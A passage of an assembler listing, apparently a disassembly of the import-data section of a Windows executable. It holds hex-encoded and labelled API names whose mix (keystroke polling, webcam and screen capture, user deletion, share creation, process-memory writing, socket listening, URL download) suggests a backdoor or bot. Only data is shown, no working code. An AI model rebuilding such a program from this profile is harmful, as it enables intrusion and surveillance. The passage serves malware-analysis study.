dd 1392D2h, 1392E6h, 1392F0h, 0
dd 139312h, 0
dd 139326h, 0
dd 139346h, 0
dd 139364h, 0
dd 139382h, 0
dd 13939Eh, 0
dd 1393B6h, 1393CEh, 0
dd 1393ECh, 139400h, 0
dd 13941Ch, 139426h, 0
dd 139442h, 0
dd 13945Eh, 0
dd 139478h, 0
dd 139498h, 1394A2h, 1394B0h, 0
dd 1394C6h, 0
dd 1394E8h, 0
dd 139504h, 0
dd 139520h, 0
dd 13953Eh, 0
dd 13955Eh, 13957Ah, 13958Ch, 139598h, 1395AAh, 1395B8h
dd 1395CCh, 1395E4h, 1395FCh, 13960Eh, 139622h, 139632h
dd 139648h, 139664h, 139676h, 139686h, 139696h, 1396A2h
dd 1396B8h, 1396CEh, 0
dd 1396ECh, 1396FEh, 0
dd 139722h, 0
dd 139748h, 139756h, 139764h, 139772h, 139788h, 13979Eh
dd 0
dd 1397BEh, 1397CCh, 1397E4h, 1397F2h, 1397FEh, 139810h
dd 139820h, 139834h, 139846h, 139854h, 139868h, 0
dd 13988Ch, 1398A2h, 1398B8h, 1398D6h, 1398E4h, 1398F2h
dd 139906h, 13991Ah, 13992Ah, 139940h, 139954h, 13996Ch
dd 13998Eh, 1399AAh, 1399BCh, 1399D6h, 1399EAh, 1399FAh
dd 139A0Ah, 139A1Ah, 139A26h, 139A32h, 139A40h, 139A5Ch
dd 139A74h, 139A8Ch, 139A9Eh, 0
dd 139ABCh, 139AC8h, 139AD4h, 139AE4h, 0
dd 139B08h, 139B1Ah, 0
dd 139B34h, 139B40h, 139B52h, 139B62h, 139B80h, 139B88h
dd 139B9Ch, 139BAAh, 139BBCh, 139BCCh, 139BDAh, 139BECh
dd 0
dd 139C0Ah, 139C20h, 139C2Ch, 0
dd 139C44h, 139C5Eh, 139C70h, 139C7Eh, 139C8Ch, 139C98h
dd 0
dd 139CB0h, 139CC4h, 139CDAh, 139CEEh, 139CFAh, 0
dd 139D1Ch, 139D2Ah, 0
dd 139D40h, 139D4Eh, 139D5Eh, 139D6Eh, 0
dd 139D84h, 139DA0h, 139DB2h, 139DC8h, 139DDCh, 139DF0h
dd 139E02h, 139E10h, 139E24h, 139E38h, 139E48h, 0
dd 139E62h, 0
dd 139E80h, 0
dd 6E72656Bh, 32336C65h, 6C6C642Eh, 0
aGetfiletime db 'GetFileTime',0
dd 65530000h, 766E4574h, 6E6F7269h, 746E656Dh, 69726156h
dd 656C6261h, 41h, 706D6F43h, 53657261h, 6E697274h, 5767h
dd 6F430000h, 7261706Dh, 72745365h, 41676E69h, 0
aSetendoffile db 'SetEndOfFile',0
align 4
aFlushfilebuffe db 'FlushFileBuffers',0
align 4
aSetstdhandle db 'SetStdHandle',0
align 4
aIsbadcodeptr db 'IsBadCodePtr',0
align 4
aIsbadreadptr db 'IsBadReadPtr',0
align 2
aKernel32_dll db 'kernel32.dll',0
align 4
dd 65470000h, 72745374h, 54676E69h, 57657079h, 0
aGetstringtypea db 'GetStringTypeA',0
align 4
dd 65470000h, 766E4574h, 6E6F7269h, 746E656Dh, 69727453h
dd 5773676Eh, 0
aGetenvironment db 'GetEnvironmentStrings',0
align 10h
aFreeenvironmen db 'FreeEnvironmentStringsW',0
dd 72460000h, 6E456565h, 6F726976h, 6E656D6Eh, 72745374h
dd 73676E69h, 41h, 61686E55h, 656C646Eh, 63784564h, 69747065h
dd 69466E6Fh, 7265746Ch, 0
aGetoemcp db 'GetOEMCP',0
align 4
aGetacp db 'GetACP',0
align 4
dd 65470000h, 49504374h, 6F666Eh, 434C0000h, 5370614Dh
dd 6E697274h, 5767h, 434C0000h, 5370614Dh, 6E697274h, 4167h
dd 65470000h, 6C694674h, 70795465h, 65h, 74697845h, 65726854h
dd 6461h, 65470000h, 63695474h, 756F436Bh, 746Eh, 75510000h
dd 50797265h, 6F667265h, 6E616D72h, 6F436563h, 65746E75h
dd 72h, 72657551h, 72655079h, 6D726F66h, 65636E61h, 71657246h
dd 636E6575h, 79h, 65656C53h, 70h, 746C754Dh, 74794269h
dd 576F5465h, 43656469h, 726168h, 6E72656Bh, 32336C65h
dd 6C6C642Eh, 0
aWritefile db 'WriteFile',0
align 4
aTransactnamedp db 'TransactNamedPipe',0
aKernel32_dll_0 db 'kernel32.dll',0
align 4
dd 65470000h, 6D695474h, 726F4665h, 4174616Dh, 0
aGetdateformata db 'GetDateFormatA',0
align 10h
dd 65470000h, 73614C74h, 72724574h, 726Fh, 72430000h, 65746165h
dd 65726854h, 6461h, 6E72656Bh, 32336C65h, 6C6C642Eh, 0
aFiletimetosyst db 'FileTimeToSystemTime',0
align 4
aFiletimetoloca db 'FileTimeToLocalFileTime',0
aKernel32_dll_1 db 'kernel32.dll',0
align 10h
aLeavecriticals db 'LeaveCriticalSection',0
align 4
aEntercriticals db 'EnterCriticalSection',0
align 10h
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0
align 4
aDeletecritical db 'DeleteCriticalSection',0
aKernel32_dll_2 db 'kernel32.dll',0
align 4
dd 65470000h, 766E4574h, 6E6F7269h, 746E656Dh, 69726156h
dd 656C6261h, 656B0057h, 6C656E72h, 642E3233h, 6C6Ch, 65480000h
dd 72467061h, 6565h, 65480000h, 6C417061h, 636F6Ch, 65470000h
dd 6F725074h, 73736563h, 70616548h, 0
aVirtualqueryex db 'VirtualQueryEx',0
align 10h
dd 65520000h, 72506461h, 7365636Fh, 6D654D73h, 79726Fh
dd 65470000h, 73795374h, 496D6574h, 6F666Eh, 704F0000h
dd 72506E65h, 7365636Fh, 656B0073h, 6C656E72h, 642E3233h
dd 6C6Ch, 6F460000h, 74616D72h, 7373654Dh, 41656761h, 0
aGlobalunlock db 'GlobalUnlock',0
align 4
aGloballock db 'GlobalLock',0
align 10h
aKernel32_dll_3 db 'kernel32.dll',0
align 10h
aSetfiletime db 'SetFileTime',0
dd 72430000h, 65746165h, 636F7250h, 41737365h, 0
aExpandenvironm db 'ExpandEnvironmentStringsA',0
align 4
aSetfileattribu db 'SetFileAttributesA',0
align 10h
dd 65470000h, 6D655474h, 74615070h, 4168h, 65470000h, 72655674h
dd 6E6F6973h, 417845h, 6F430000h, 69467970h, 41656Ch, 65470000h
dd 69784574h, 646F4374h, 6F725065h, 73736563h, 0
aPeeknamedpipe db 'PeekNamedPipe',0
align 4
aDuplicatehandl db 'DuplicateHandle',0
dd 65470000h, 72754374h, 746E6572h, 636F7250h, 737365h
dd 72430000h, 65746165h, 65706950h, 0
aGlobalmemoryst db 'GlobalMemoryStatus',0
align 4
dd 65470000h, 73795374h, 446D6574h, 63657269h, 79726F74h
dd 41h, 4C746547h, 6C61636Fh, 656D6954h, 656B0000h, 6C656E72h
dd 642E3233h, 6C6Ch, 69570000h, 68436564h, 6F547261h, 746C754Dh
dd 74794269h, 65h, 43746547h, 75706D6Fh, 4E726574h, 41656D61h
dd 0
aDeletefilea db 'DeleteFileA',0
dd 65470000h, 72754374h, 746E6572h, 636F7250h, 49737365h
dd 64h, 74696157h, 53726F46h, 6C676E69h, 6A624F65h, 746365h
dd 72430000h, 65746165h, 6574754Dh, 4178h, 65540000h, 6E696D72h
dd 54657461h, 61657268h, 64h, 65766F4Dh, 656C6946h, 41h
dd 6D726554h, 74616E69h, 6F725065h, 73736563h, 0
aLstrcmpi db 'lstrcmpi',0
align 4
aGetlocaleinfoa db 'GetLocaleInfoA',0
align 4
dd 65470000h, 676F4C74h, 6C616369h, 76697244h, 7365h, 74520000h
dd 776E556Ch, 646E69h, 65470000h, 6D695474h, 6E6F5A65h
dd 666E4965h, 616D726Fh, 6E6F6974h, 0
aGetsystemtime db 'GetSystemTime',0
align 10h
aHeaprealloc db 'HeapReAlloc',0
dd 65470000h, 61745374h, 70757472h, 6F666E49h, 41h, 43746547h
dd 616D6D6Fh, 694C646Eh, 41656Eh, 65470000h, 72655674h
dd 6E6F6973h, 0
aGetenvironme_0 db 'GetEnvironmentVariableA',0
dd 65480000h, 65447061h, 6F727473h, 79h, 70616548h, 61657243h
dd 6574h, 69560000h, 61757472h, 6572466Ch, 65h, 74726956h
dd 416C6175h, 636F6C6Ch, 0
aIsbadwriteptr db 'IsBadWritePtr',0
align 4
aRaiseexception db 'RaiseException',0
align 4
dd 65480000h, 69537061h, 657Ah, 6F4C0000h, 65526B63h, 72756F73h
dd 6563h, 65470000h, 64745374h, 646E6148h, 656Ch, 73726576h
dd 2E6E6F69h, 6C6C64h, 65470000h, 6C694674h, 72655665h
dd 6E6F6973h, 6F666E49h, 657A6953h, 41h, 46746547h, 56656C69h
dd 69737265h, 6E496E6Fh, 416F66h, 65560000h, 65755172h
dd 61567972h, 4165756Ch, 73770000h, 32335F32h, 6C6C642Eh
dd 0
aWsacleanup db 'WSACleanup',0
align 4
dd 53570000h, 61745341h, 70757472h, 0
aSetsockopt db 'setsockopt',0
align 4
dd 69620000h, 646Eh, 696C0000h, 6E657473h, 0
aAccept db 'accept',0
align 10h
dd 6E690000h, 615F7465h, 726464h, 74680000h, 736E6Fh, 65720000h
dd 7663h, 65730000h, 646Eh, 65730000h, 7463656Ch, 0
a__wsafdisset db '__WSAFDIsSet',0
align 10h
aHtons db 'htons',0
align 4
aInet_ntoa db 'inet_ntoa',0
align 4
aSocket db 'socket',0
align 4
dd 6F690000h, 736C7463h, 656B636Fh, 74h, 6E6E6F63h, 746365h
dd 6C630000h, 7365736Fh, 656B636Fh, 64670074h, 2E323369h
dd 6C6C64h, 65440000h, 6574656Ch, 4344h, 6E72656Bh, 32336C65h
dd 6C6C642Eh, 0
aModule32first db 'Module32First',0
aWininet_dll db 'wininet.dll',0
align 4
aInternetgetcon db 'InternetGetConnectedStateEx',0
aNetapi32_dll db 'netapi32.dll',0
align 10h
aNetuserdel db 'NetUserDel',0
align 4
dd 654E0000h, 61685374h, 65446572h, 6467006Ch, 2E323369h
dd 6C6C64h, 65530000h, 7463656Ch, 656A624Fh, 7463h, 72657375h
dd 642E3233h, 6C6Ch, 65470000h, 79654B74h, 74617453h, 656E0065h
dd 69706174h, 642E3233h, 6C6Ch, 654E0000h, 65735574h, 64644172h
dd 64610000h, 69706176h, 642E3233h, 6C6Ch, 704F0000h, 65536E65h
dd 63697672h, 4165h, 65470000h, 65735574h, 6D614E72h, 4165h
dd 74530000h, 53747261h, 69767265h, 416563h, 73490000h
dd 696C6156h, 63655364h, 74697275h, 73654479h, 70697263h
dd 726F74h, 5F327377h, 642E3233h, 6C6Ch, 5F5F0000h, 46415357h
dd 53734944h, 7465h, 6E72656Bh, 32336C65h, 6C6C642Eh, 0
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0
aNetapi32_dll_0 db 'netapi32.dll',0
align 4
aNetshareadd db 'NetShareAdd',0
aAdvapi32_dll db 'advapi32.dll',0
align 10h
aCloseserviceha db 'CloseServiceHandle',0
align 4
aWininet_dll_0 db 'wininet.dll',0
dd 6E490000h, 6E726574h, 72437465h, 556B6361h, 416C72h
dd 61766461h, 32336970h, 6C6C642Eh, 0
aRegqueryvaluee db 'RegQueryValueExA',0
align 2
aWininet_dll_1 db 'wininet.dll',0
align 4
aInternetopenur db 'InternetOpenUrlA',0
align 2
aWininet_dll_2 db 'wininet.dll',0
align 4
aInternetreadfi db 'InternetReadFile',0
align 2
aWs2_32_dll db 'ws2_32.dll',0
align 4
aWsaasyncselect db 'WSAAsyncSelect',0
align 4
aKernel32_dll_4 db 'kernel32.dll',0
align 4
aProcess32next db 'Process32Next',0
aIphlpapi_dll db 'iphlpapi.dll',0
align 10h
dd 63490000h, 6553706Dh, 6345646Eh, 6F68h, 61736E64h, 642E6970h
dd 6C6Ch, 6E440000h, 756C4673h, 65526873h, 766C6F73h, 61437265h
dd 656863h, 33696467h, 6C642E32h, 6Ch, 44746547h, 6F434249h
dd 54726F6Ch, 656C6261h, 73770000h, 32335F32h, 6C6C642Eh
dd 0
aHtonl db 'htonl',0
aWs2_32_dll_0 db 'ws2_32.dll',0
align 4
aHtons_0 db 'htons',0
aMpr_dll db 'mpr.dll',0
align 4
aWnetcancelconn db 'WNetCancelConnection2W',0
align 4
aWininet_dll_3 db 'wininet.dll',0
dd 6E490000h, 6E726574h, 65477465h, 6E6F4374h, 7463656Eh
dd 74536465h, 657461h, 72657375h, 642E3233h, 6C6Ch, 78450000h
dd 69577469h, 776F646Eh, 784573h, 6174656Eh, 32336970h
dd 6C6C642Eh, 0
aNetshareenum db 'NetShareEnum',0
align 2
aAdvapi32_dll_0 db 'advapi32.dll',0
align 4
dd 6F430000h, 6F72746Eh, 7265536Ch, 65636976h, 0
aDeleteservice db 'DeleteService',0
aAvicap32_dll db 'avicap32.dll',0
align 4
dd 61630000h, 65724370h, 43657461h, 75747061h, 69576572h
dd 776F646Eh, 73770041h, 32335F32h, 6C6C642Eh, 0
aWsacleanup_0 db 'WSACleanup',0
align 10h
aGdi32_dll db 'gdi32.dll',0
align 4
aDeleteobject db 'DeleteObject',0
align 2
aNetapi32_dll_1 db 'netapi32.dll',0
align 4
dd 654E0000h, 65735574h, 756E4572h, 6461006Dh, 69706176h
dd 642E3233h, 6C6Ch, 65520000h, 6C654467h, 56657465h, 65756C61h
dd 656B0041h, 6C656E72h, 642E3233h, 6C6Ch, 65470000h, 676F4C74h
dd 6C616369h, 76697244h, 72745365h, 73676E69h, 68730041h
dd 336C6C65h, 6C642E32h, 6Ch, 6C656853h, 6578456Ch, 65747563h
dd 73770041h, 32335F32h, 6C6C642Eh, 0
aWsastartup db 'WSAStartup',0
align 4
aWininet_dll_4 db 'wininet.dll',0
dd 74480000h, 65537074h, 6552646Eh, 73657571h, 4174h, 6362646Fh
dd 642E3233h, 6C6Ch, 51530000h, 6C6C414Ch, 6148636Fh, 656C646Eh
dd 73750000h, 32337265h, 6C6C642Eh, 0
aGetforegroundw db 'GetForegroundWindow',0
aIphlpapi_dll_0 db 'iphlpapi.dll',0
align 4
aIcmpcreatefile db 'IcmpCreateFile',0
align 4
aWs2_32_dll_1 db 'ws2_32.dll',0
align 10h
dd 53570000h, 74654741h, 7473614Ch, 6F727245h, 69770072h
dd 656E696Eh, 6C642E74h, 6Ch, 65746E49h, 74656E72h, 6E65704Fh
dd 73750041h, 32337265h, 6C6C642Eh, 0
aGetwindowtexta db 'GetWindowTextA',0
align 4
dd 73490000h, 646E6957h, 776Fh, 5F327377h, 642E3233h, 6C6Ch
dd 65670000h, 636F7374h, 6D616E6Bh, 65h, 6E6E6F63h, 746365h
dd 53570000h, 636F4941h, 6C74h, 61766461h, 32336970h, 6C6C642Eh
dd 0
aRegcreatekeyex db 'RegCreateKeyExA',0
aWs2_32_dll_2 db 'ws2_32.dll',0
align 4
dd 65670000h, 736F6874h, 61796274h, 726464h, 61766461h
dd 32336970h, 6C6C642Eh, 0
aLookupprivileg db 'LookupPrivilegeValueA',0
align 4
aEnumservicesst db 'EnumServicesStatusA',0
aOdbc32_dll db 'odbc32.dll',0
align 4
dd 51530000h, 6578454Ch, 72694463h, 746365h, 696E6977h
dd 2E74656Eh, 6C6C64h, 74480000h, 704F7074h, 65526E65h
dd 73657571h, 4174h, 72657375h, 642E3233h, 6C6Ch, 65470000h
dd 79734174h, 654B636Eh, 61745379h, 6574h, 704F0000h, 6C436E65h
dd 6F627069h, 647261h, 696E6977h, 2E74656Eh, 6C6C64h, 6E490000h
dd 6E726574h, 6F437465h, 63656E6Eh, 4174h, 5F327377h, 642E3233h
dd 6C6Ch, 65720000h, 72667663h, 6D6Fh, 61766461h, 32336970h
dd 6C6C642Eh, 0
aRegclosekey db 'RegCloseKey',0
aWs2_32_dll_3 db 'ws2_32.dll',0
align 4
dd 65730000h, 636F7374h, 74706F6Bh, 64610000h, 69706176h
dd 642E3233h, 6C6Ch, 704F0000h, 72506E65h, 7365636Fh, 6B6F5473h
dd 6E65h, 5F327377h, 642E3233h, 6C6Ch, 65730000h, 7463656Ch
dd 64670000h, 2E323369h, 6C6C64h, 72430000h, 65746165h
dd 414344h, 72657375h, 642E3233h, 6C6Ch, 65470000h, 696C4374h
dd 616F6270h, 61446472h, 6174h, 61766461h, 32336970h, 6C6C642Eh
dd 0
aOpenscmanagera db 'OpenSCManagerA',0
align 4
aWs2_32_dll_4 db 'ws2_32.dll',0
align 4
dd 74680000h, 6C6E6Fh, 74680000h, 736E6Fh, 6E72656Bh, 32336C65h
dd 6C6C642Eh, 0
aProcess32first db 'Process32First',0
align 4
aGdi32_dll_0 db 'gdi32.dll',0
align 10h
aGetdevicecaps db 'GetDeviceCaps',0
aUser32_dll db 'user32.dll',0
align 4
aFindwindowa db 'FindWindowA',0
aNetapi32_dll_2 db 'netapi32.dll',0
align 4
aNetmessagebuff db 'NetMessageBufferSend',0
align 2
aWs2_32_dll_5 db 'ws2_32.dll',0
align 4
aGethostname db 'gethostname',0
dd 65720000h, 7663h, 6362646Fh, 642E3233h, 6C6Ch, 51530000h
dd 6572464Ch, 6E614865h, 656C64h, 6E72656Bh, 32336C65h
dd 6C6C642Eh, 0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
align 2
aAdvapi32_dll_1 db 'advapi32.dll',0
align 4
dd 65520000h, 74655367h, 756C6156h, 41784565h, 73770000h
dd 32335F32h, 6C6C642Eh, 0
aListen db 'listen',0
align 4
dd 69620000h, 646Eh, 63697661h, 32337061h, 6C6C642Eh, 0
aCapgetdriverde db 'capGetDriverDescriptionA',0
align 2
aWininet_dll_5 db 'wininet.dll',0
align 4
aInternetcloseh db 'InternetCloseHandle',0
aOdbc32_dll_0 db 'odbc32.dll',0
align 4
dd 51530000h, 6972444Ch, 43726576h, 656E6E6Fh, 7463h, 5F327377h
dd 642E3233h, 6C6Ch, 6E690000h, 615F7465h, 726464h, 33696467h
dd 6C642E32h, 6Ch, 61657243h, 49446574h, 63655342h, 6E6F6974h
dd 0
aBitblt db 'BitBlt',0
align 10h
dd 72430000h, 65746165h, 706D6F43h, 62697461h, 4344656Ch
dd 73770000h, 32335F32h, 6C6C642Eh, 0
aSend db 'send',0
align 2
aUser32_dll_0 db 'user32.dll',0
align 4
aCloseclipboard db 'CloseClipboard',0
align 4
aNetapi32_dll_3 db 'netapi32.dll',0
align 4
aNetusergetinfo db 'NetUserGetInfo',0
align 4
aUser32_dll_1 db 'user32.dll',0
align 4
dd 65530000h, 654D646Eh, 67617373h, 4165h, 6E72656Bh, 32336C65h
dd 6C6C642Eh, 0
aGetdrivetypea db 'GetDriveTypeA',0
aWs2_32_dll_6 db 'ws2_32.dll',0
align 10h
aSendto db 'sendto',0
align 4
aAdvapi32_dll_2 db 'advapi32.dll',0
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0
align 10h
aRegopenkeyexa db 'RegOpenKeyExA',0
aIphlpapi_dll_1 db 'iphlpapi.dll',0
align 4
dd 65440000h, 6574656Ch, 654E7049h, 746E4574h, 7972h, 65470000h
dd 4E704974h, 61547465h, 656C62h, 5F327377h, 642E3233h
dd 6C6Ch, 6F730000h, 74656B63h, 0
aGethostbyname db 'gethostbyname',0
aOdbc32_dll_1 db 'odbc32.dll',0
align 4
aSqlsetenvattr db 'SQLSetEnvAttr',0
aWs2_32_dll_7 db 'ws2_32.dll',0
align 10h
aInet_ntoa_0 db 'inet_ntoa',0
aNetapi32_dll_4 db 'netapi32.dll',0
align 4
dd 654E0000h, 69704174h, 66667542h, 72467265h, 6565h, 5F327377h
dd 642E3233h, 6C6Ch, 63610000h, 74706563h, 0
aClosesocket db 'closesocket',0
dd 6F690000h, 736C7463h, 656B636Fh, 706D0074h, 6C642E72h
dd 6Ch, 74654E57h, 43646441h, 656E6E6Fh, 6F697463h, 57326Eh
dd 5F327377h, 642E3233h, 6C6Ch, 53570000h, 636F5341h, 4174656Bh
dd 656B0000h, 6C656E72h, 642E3233h, 6C6Ch, 65530000h, 72724574h
dd 6F4D726Fh, 6564h, 72657375h, 642E3233h, 6C6Ch, 65440000h
dd 6F727473h, 6E695779h, 776F64h, 6C687069h, 69706170h
dd 6C6C642Eh, 0
aIcmpclosehandl db 'IcmpCloseHandle',0
aKernel32_dll_5 db 'kernel32.dll',0
align 10h
aInitializecr_0 db 'InitializeCriticalSection',0
align 4
aGetprocaddress db 'GetProcAddress',0
align 4
dd 6F4C0000h, 466C6163h, 656572h, 61520000h, 45657369h
dd 70656378h, 6E6F6974h, 0
aLocalalloc db 'LocalAlloc',0
align 4
dd 65470000h, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 654C0000h
dd 43657661h, 69746972h, 536C6163h, 69746365h, 6E6Fh, 6E450000h
dd 43726574h, 69746972h, 536C6163h, 69746365h, 6E6Fh, 75440000h
dd 63696C70h, 48657461h, 6C646E61h, 65h, 53746547h, 74726F68h
dd 68746150h, 656D614Eh, 41h, 75736552h, 6854656Dh, 64616572h
dd 0
aWriteprocessme db 'WriteProcessMemory',0
align 4
dd 65470000h, 69725074h, 65746176h, 666F7250h, 53656C69h
dd 69746365h, 416E6Fh, 65470000h, 72745374h, 54676E69h
dd 41657079h, 0
aLcmapstringw db 'LCMapStringW',0
align 4
aLcmapstringa db 'LCMapStringA',0
align 4
aRtlunwind db 'RtlUnwind',0
align 4
aWidechartomult db 'WideCharToMultiByte',0
dd 754D0000h, 4269746Ch, 54657479h, 6469576Fh, 61684365h
dd 72h, 53746547h, 6E697274h, 70795467h, 5765h, 72657375h
dd 642E3233h, 6C6Ch, 65440000h, 6E695766h, 50776F64h, 41636F72h
dd 0
aAdjustwindowre db 'AdjustWindowRectEx',0
align 4
aKernel32_dll_6 db 'kernel32.dll',0
align 4
aFlushinstructi db 'FlushInstructionCache',0
aKernel32_dll_7 db 'kernel32.dll',0
align 4
dd 6C430000h, 4865736Fh, 6C646E61h, 65h, 61657243h, 69466574h
dd 41656Ch, 72430000h, 65746165h, 656C6946h, 57h, 61657243h
dd 69466574h, 614D656Ch, 6E697070h, 4167h, 72430000h, 65746165h
dd 656C6946h, 7070614Dh, 57676E69h, 0
aCreateprocessa db 'CreateProcessA',0
align 10h
aKernel32_dll_8 db 'kernel32.dll',0
align 10h
aDeletefilea_0 db 'DeleteFileA',0
dd 6E450000h, 43726574h, 69746972h, 536C6163h, 69746365h
dd 6E6Fh, 78450000h, 72507469h, 7365636Fh, 73h, 646E6946h
dd 736F6C43h, 65h, 646E6946h, 73726946h, 6C694674h, 4165h
dd 69460000h, 654E646Eh, 69467478h, 41656Ch, 6C460000h
dd 46687375h, 42656C69h, 65666675h, 7372h, 6F460000h, 74616D72h
dd 7373654Dh, 41656761h, 0
aFreelibrary db 'FreeLibrary',0
dd 65470000h, 72754374h, 746E6572h, 636F7250h, 737365h
dd 65470000h, 72754374h, 746E6572h, 636F7250h, 49737365h
dd 656B0064h, 6C656E72h, 642E3233h, 6C6Ch, 65470000h, 6C694674h
dd 74744165h, 75626972h, 41736574h, 0
aGetfileattribu db 'GetFileAttributesW',0
align 4
dd 65470000h, 6C694674h, 666E4965h, 616D726Fh, 6E6F6974h
dd 61487942h, 656C646Eh, 0
aGetfilesize db 'GetFileSize',0
dd 65470000h, 6C694674h, 6D695465h, 65h, 46746547h, 506C6C75h
dd 4E687461h, 41656D61h, 0
aGetfullpathnam db 'GetFullPathNameW',0
align 4
aGetlasterror db 'GetLastError',0
align 4
aGetmodulefilen db 'GetModuleFileNameA',0
align 10h
dd 65470000h, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 65470000h
dd 69725074h, 65746176h, 666F7250h, 49656C69h, 41746Eh
dd 65470000h, 69725074h, 65746176h, 666F7250h, 53656C69h
dd 69746365h, 614E6E6Fh, 4173656Dh, 0
aGetprivateprof db 'GetPrivateProfileStringA',0
align 4
aGetprocaddre_0 db 'GetProcAddress',0
align 4
dd 65470000h, 73795374h, 546D6574h, 41656D69h, 6C694673h
dd 6D695465h, 65h, 54746547h, 46706D65h, 4E656C69h, 41656D61h
dd 0
aGettemppatha db 'GetTempPathA',0
align 4
aGetversionexa db 'GetVersionExA',0
align 4
aGettickcount db 'GetTickCount',0
align 4
aHeapalloc db 'HeapAlloc',0
align 4
aHeapfree db 'HeapFree',0
align 4
aHeapcreate db 'HeapCreate',0
align 10h
dd 6E490000h, 61697469h, 657A696Ch, 74697243h, 6C616369h
dd 74636553h, 6E6F69h, 65440000h, 6574656Ch, 74697243h
dd 6C616369h, 74636553h, 6E6F69h, 654C0000h, 43657661h
dd 69746972h, 536C6163h, 69746365h, 6E6Fh, 6F4C0000h, 694C6461h
dd 72617262h, 41784579h, 0
aLoadlibrarya db 'LoadLibraryA',0
align 2
aKernel32_dll_9 db 'kernel32.dll',0
align 4
dd 6F4C0000h, 466C6163h, 656572h, 6F4C0000h, 69466B63h
dd 656Ch, 614D0000h, 65695670h, 46664F77h, 656C69h, 754D0000h
dd 4269746Ch, 54657479h, 6469576Fh, 61684365h, 656B0072h
dd 6C656E72h, 642E3233h, 6C6Ch, 61520000h, 45657369h, 70656378h
dd 6E6F6974h, 0
aReadfile db 'ReadFile',0
align 2
aKernel32_dl_10 db 'kernel32.dll',0
align 4
dd 65530000h, 65764574h, 746Eh, 65530000h, 6C694674h, 696F5065h
dd 7265746Eh, 0
aSetlasterror db 'SetLastError',0
align 4
aSetunhandledex db 'SetUnhandledExceptionFilter',0
dd 6C530000h, 706565h, 65540000h, 6E696D72h, 50657461h
dd 65636F72h, 7373h, 6E550000h, 6B636F6Ch, 656C6946h, 0
aUnmapviewoffil db 'UnmapViewOfFile',0
dd 69560000h, 61757472h, 6C6C416Ch, 636Fh, 69560000h, 61757472h
dd 6572466Ch, 65h, 74726956h, 506C6175h, 65746F72h, 7463h
dd 69560000h, 61757472h, 6575516Ch, 7972h, 6E72656Bh, 32336C65h
dd 6C6C642Eh, 0
aWidechartomu_0 db 'WideCharToMultiByte',0
dd 72570000h, 46657469h, 656C69h, 736C0000h, 6D637274h
dd 6970h, 72657375h, 642E3233h, 6C6Ch, 68430000h, 65676E61h
dd 70736944h, 5379616Ch, 69747465h, 4173676Eh, 0
aCharupperbuffa db 'CharUpperBuffA',0
align 10h
dd 6F4C0000h, 6D496461h, 41656761h, 0
aMessageboxa db 'MessageBoxA',0
dd 73770000h, 6E697270h, 416674h, 76770000h, 69727073h
dd 4166746Eh, 64670000h, 2E323369h, 6C6C64h, 64410000h
dd 6E6F4664h, 73655274h, 6372756Fh, 4165h, 72430000h, 65746165h
dd 706D6F43h, 62697461h, 4344656Ch, 0
aCreatedibsecti db 'CreateDIBSection',0
align 10h
aDeletedc db 'DeleteDC',0
align 4
aRemovefontreso db 'RemoveFontResourceA',0
aUser32_dll_2 db 'user32.dll',0
align 4
dd 65420000h, 506E6967h, 746E6961h, 0
aEndpaint db 'EndPaint',0
align 2
aGdi32_dll_1 db 'gdi32.dll',0
dd 65470000h, 6A624F74h, 41746365h, 0
aSelectobject db 'SelectObject',0
align 10h
aDeleteobject_0 db 'DeleteObject',0
align 10h
aBitblt_0 db 'BitBlt',0
align 4
aUser32_dll_3 db 'user32.dll',0
align 4
dd 65470000h, 6E695774h, 54776F64h, 61657268h, 6F725064h
dd 73736563h, 6449h, 65530000h, 74634174h, 57657669h, 6F646E69h
dd 77h, 46746553h, 6765726Fh, 6E756F72h, 6E695764h, 776F64h
dd 65520000h, 74736967h, 6C437265h, 45737361h, 4178h, 65470000h
dd 73795374h, 4D6D6574h, 69727465h, 7363h, 72430000h, 65746165h
dd 646E6957h, 7845776Fh, 41h, 4D746547h, 61737365h, 416567h
dd 72540000h, 6C736E61h, 4D657461h, 61737365h, 6567h, 69440000h
dd 74617073h, 654D6863h, 67617373h, 4165h, 65440000h, 6F727473h
dd 6E695779h, 776F64h, 6E450000h, 69576D75h, 776F646Eh
dd 73750073h, 32337265h, 6C6C642Eh, 0
aPostmessagea db 'PostMessageA',0
align 2
aKernel32_dl_11 db 'kernel32.dll',0
align 10h
dd 72430000h, 65746165h, 65726854h, 6461h, 5Ch dup(0)
_idata ends
end